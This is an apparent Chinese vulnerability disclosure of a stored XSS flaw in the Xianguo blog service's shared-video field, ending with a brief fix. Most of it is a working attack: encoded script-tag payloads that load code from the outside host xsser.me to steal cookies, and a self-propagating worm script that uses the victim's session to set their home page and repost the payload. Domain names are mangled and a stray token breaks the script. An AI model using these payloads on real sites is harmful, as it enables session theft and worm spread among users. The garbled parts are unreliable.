鲜果日志里面的分享视频和音乐中,可以通过插入一些跨站代码来实现XSS的效果,详见证明。
对用户进行持久控制,可以通过发一条含有跨站代码的日志,然后将鲜果社区设为我的鲜果首页,这样就可以实现对用户的持久控制:用户每登录一次鲜果就会触发一次跨站代码,一次又一次,一次又一次
演示地址:http://xianguo测试数据/1378148/ 首先我们来到分享视频的地方,我们随便写一个视频 ,保存,截包。 在video这个地方会发现一个神奇的东西,
%7B%22flashvar%22%3A%22OgYtHXq8oVw%22%2C%22flash%22%3A%22http%3A%2F%2FHdhCmsTesttudou测试数据%2Fv%2FOgYtHXq8oVw%2Fv.swf%22%2C%22imageurl%22%3A%22http%3A%2F%2Fi1.tdimg测试数据%2F118%2F195%2F384%2Fp.jpg'%20%2Clpic%20%3D%20%5C%22http%3A%2F%2Fi1.tdimg测试数据%2F118%2F195%2F384%2Fp.jpg%22%2C%22title%22%3A%22%E6%9D%A8%E5%B9%82%20%E5%88%98%E6%81%BA%E5%A8%81%20%E9%94%99%E6%80%AA%22%2C%22flag%22%3A1%2C%22url%22%3A%22http%3A%2F%2FHdhCmsTesttudou测试数据%2Fprograms%2Fview%2FOgYtHXq8oVw%22%7D 进行一下URIComp解码
{"flashvar":"OgYtHXq8oVw","flash":"http://HdhCmsTesttudou测试数据/v/OgYtHXq8oVw/v.swf","imageurl":"http://i1.tdimg测试数据/118/195/384/p.jpg' ,lpic = \"http://i1.tdimg测试数据/118/195/384/p.jpg","title":"杨幂 刘恺威 错怪","flag":1,"url":"http://HdhCmsTesttudou测试数据/programs/view/OgYtHXq8oVw"} 看到了我们很熟悉的{}这种类型,弱弱的表示不懂的专业术语是什么....... 然后将我们的跨站代码进行Unicode编码 "><script src=http://xsser.me/pIQKKz></script>
\u0022\u003E\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0073\u0072\u0063\u003D\u0068\u0074\u0074\u0070\u003A\u002f\u002f\u0078\u0073\u0073\u0065\u0072\u002e\u006d\u0065\u002f\u0070\u0049\u0051\u004b\u004b\u007a\u003E\u003C\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003E 然后将上面的编码插入到flash地址中
{"flashvar":"OgYtHXq8oVw","flash":"http://HdhCmsTesttudou测试数据/v/OgYtHXq8oVw/v.swf\u0022\u003E\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0073\u0072\u0063\u003D\u0068\u0074\u0074\u0070\u003A\u002f\u002f\u0078\u0073\u0073\u0065\u0072\u002e\u006d\u0065\u002f\u0070\u0049\u0051\u004b\u004b\u007a\u003E\u003C\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003E","imageurl":"http://i1.tdimg测试数据/118/195/384/p.jpg' ,lpic = \"http://i1.tdimg测试数据/118/195/384/p.jpg","title":"杨幂 刘恺威 错怪","flag":1,"url":"http://HdhCmsTesttudou测试数据/programs/view/OgYtHXq8oVw"} 进行URIComp编码
%7B%22flashvar%22%3A%22OgYtHXq8oVw%22%2C%22flash%22%3A%22http%3A%2F%2FHdhCmsTesttudou测试数据%2Fv%2FOgYtHXq8oVw%2Fv.swf%5Cu0022%5Cu003E%5Cu003C%5Cu0073%5Cu0063%5Cu0072%5Cu0069%5Cu0070%5Cu0074%5Cu0020%5Cu0073%5Cu0072%5Cu0063%5Cu003D%5Cu0068%5Cu0074%5Cu0074%5Cu0070%5Cu003A%5Cu002f%5Cu002f%5Cu0078%5Cu0073%5Cu0073%5Cu0065%5Cu0072%5Cu002e%5Cu006d%5Cu0065%5Cu002f%5Cu0070%5Cu0049%5Cu0051%5Cu004b%5Cu004b%5Cu007a%5Cu003E%5Cu003C%5Cu002f%5Cu0073%5Cu0063%5Cu0072%5Cu0069%5Cu0070%5Cu0074%5Cu003E%22%2C%22imageurl%22%3A%22http%3A%2F%2Fi1.tdimg测试数据%2F118%2F195%2F384%2Fp.jpg'%20%2Clpic%20%3D%20%5C%22http%3A%2F%2Fi1.tdimg测试数据%2F118%2F195%2F384%2Fp.jpg%22%2C%22title%22%3A%22%E6%9D%A8%E5%B9%82%20%E5%88%98%E6%81%BA%E5%A8%81%20%E9%94%99%E6%80%AA%22%2C%22flag%22%3A1%2C%22url%22%3A%22http%3A%2F%2FHdhCmsTesttudou测试数据%2Fprograms%2Fview%2FOgYtHXq8oVw%22%7D 然后替换掉原来的video中。
效果如下
COOKIES
其实拿到了COOKIES就可以登录了,但还是来说说持久控制。
// Payload carried in the shared-video JSON (see the decoded "flash" value above),
// reproduced here as found on the page. Defender's reading of what it does:
//
// pkav is a minimal XHR helper.
//   ajax()  builds the request object: XMLHttpRequest first, then the two legacy
//           ActiveX ProgIDs; returns false when none of them can be created.
//   req()   upper-cases the method (default "GET"), opens url asynchronously,
//           sets the form content-type for POST, calls callback(responseText)
//           only on readyState 4 / status 200, and sends either a URL-encoded
//           key=value string built from an object or the raw data string.
//   get()/post() are thin wrappers over req().
//
// The window.__x guard makes the two requests run at most once per page load:
//   1. POST /doings/sethome  with "type=snsSet"  - sets the community page as
//      the victim's home page, so the injected content is loaded on every login.
//   2. POST /doings/addblog  - publishes a blog entry whose video field carries
//      this same \u-escaped payload, which is what makes it self-propagating.
// Both requests ride on the victim's own session cookies, and neither form body
// contains an anti-CSRF token, so server-side they look like ordinary user actions.
//
// Mitigation side: encode the video JSON fields (flash, imageurl, ...) for the
// output context, treat \u-escaped sequences as the characters they decode to,
// and validate the flash URL against an allow-list of hosts; an anti-CSRF token
// on sethome/addblog would also stop the scripted re-posting.
// Detection side: addblog/sethome POSTs whose video field contains "\u003C" /
// "%5Cu003C" together with a script src are a strong indicator of this payload.
//
// NOTE(review): the stray token `HdhCmsTest2cto测试数据` just before the closing
// brace of req() appears to be a copy artifact from the hosting site rather than
// part of the original payload; as written it would throw a ReferenceError.
var pkav={ ajax:function(){ var xmlHttp; try{ xmlHttp=new XMLHttpRequest(); }catch (e){ try{ xmlHttp=new ActiveXObject("Msxml2.XMLHTTP"); }catch (e){ try{ xmlHttp=new ActiveXObject("Microsoft.XMLHTTP"); } catch (e){ return false; } } } return xmlHttp; }, req:function(url,data,method,callback){ method=(method||"").toUpperCase(); method=method||"GET"; data=data||""; if(url){ var a=this.ajax(); a.open(method,url,true); if(method=="POST"){ a.setRequestHeader("Content-type","application/x-www-form-urlencoded"); } a.onreadystatechange=function(){ if (a.readyState==4 && a.status==200) { if(callback){ callback(a.responseText); } } }; if((typeof data)=="object"){ var arr=[]; for(var i in data){ arr.push(i+"="+encodeURIComponent(data[i])); } a.send(arr.join("&")); }else{ a.send(data||null); } } HdhCmsTest2cto测试数据 }, get:function(url,callback){ this.req(url,"","GET",callback); }, post:function(url,data,callback){ this.req(url,data,"POST",callback); } }; if(!window.__x){ pkav.post("http://xianguo测试数据/doings/sethome","type=snsSet",function(rs){}); 
pkav.post("http://xianguo测试数据/doings/addblog","videoKeyword=&tag-input=%E6%B7%BB%E5%8A%A0%E6%A0%87%E7%AD%BE%EF%BC%8C%E7%94%A8%E9%80%97%E5%8F%B7%E6%88%96%E5%9B%9E%E8%BD%A6%E5%88%86%E9%9A%94&tags=%255B%255D&video=%257B%2522flashvar%2522%253A%2522OgYtHXq8oVw%2522%252C%2522flash%2522%253A%2522http%253A%252F%252FHdhCmsTesttudou测试数据%252Fv%252FOgYtHXq8oVw%252Fv.swf%255Cu0022%255Cu003E%255Cu003C%255Cu0073%255Cu0063%255Cu0072%255Cu0069%255Cu0070%255Cu0074%255Cu0020%255Cu0073%255Cu0072%255Cu0063%255Cu003D%255Cu0068%255Cu0074%255Cu0074%255Cu0070%255Cu003A%255Cu002f%255Cu002f%255Cu0078%255Cu0073%255Cu0073%255Cu0065%255Cu0072%255Cu002e%255Cu006d%255Cu0065%255Cu002f%255Cu0070%255Cu0049%255Cu0051%255Cu004b%255Cu004b%255Cu007a%255Cu003E%255Cu003C%255Cu002f%255Cu0073%255Cu0063%255Cu0072%255Cu0069%255Cu0070%255Cu0074%255Cu003E%2522%252C%2522imageurl%2522%253A%2522http%253A%252F%252Fi1.tdimg测试数据%252F118%252F195%252F384%252Fp.jpg'%2520%252Clpic%2520%253D%2520%255C%2522http%253A%252F%252Fi1.tdimg测试数据%252F118%252F195%252F384%252Fp.jpg%2522%252C%2522title%2522%253A%2522%25E6%259D%25A8%25E5%25B9%2582%2520%25E5%2588%2598%25E6%2581%25BA%25E5%25A8%2581%2520%25E9%2594%2599%25E6%2580%25AA%2522%252C%2522flag%2522%253A1%252C%2522url%2522%253A%2522http%253A%252F%252FHdhCmsTesttudou测试数据%252Fprograms%252Fview%252FOgYtHXq8oVw%2522%257D&editorValue=%3Cp%3E%E9%BB%84%E9%87%91%E5%91%A8%E5%85%A8%E5%9B%BD80%E6%99%AF%E7%82%B9%E4%B8%8B%E8%B0%83%E7%A5%A8%E4%BB%B7%3C%2Fp%3E",function(rs){}); window.__x=1; }
第一个包是把互动社区设置为首页,第二个包是发送一条含有跨站代码的日志(分别对应上面的 sethome 与 addblog 请求)
修复方案:加强过滤~~~~~~~~~ 具体来说,应在输出到页面时对 video 字段中的 flash、imageurl 等值按所在上下文进行编码(把 \u 转义形式当作其解码后的字符来处理),并对 flash 地址做域名白名单校验,而不能只依赖输入端的过滤。
时间不足,不多打字了。。。